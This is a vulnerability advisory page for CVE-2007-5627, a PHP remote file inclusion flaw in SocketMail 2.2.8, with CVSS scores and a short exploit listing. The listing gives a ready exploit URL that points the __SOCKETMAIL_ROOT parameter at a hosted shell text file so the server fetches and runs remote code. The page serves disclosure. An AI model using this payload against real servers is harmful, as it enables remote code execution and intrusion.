6.8
CVSSv2

CVE-2007-5627

Published: 23/10/2007 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in content/fnc-readmail3.php in SocketMail 2.2.8 allows remote malicious users to execute arbitrary PHP code via a URL in the __SOCKETMAIL_ROOT parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

socketmail socketmail 2.2.8

Exploits

Vulnerability Type: Remote File Inclusion Vulnerable file: /mail/content/fnc-readmail3php Exploit URL: localhost/mail/content/fnc-readmail3php?__SOCKETMAIL_ROOT=localhost/shelltxt? Method: get Register_globals: On Vulnerable variable: __SOCKETMAIL_ROOT Line number: 399 Lines: ---------------------------------------------- } else { ...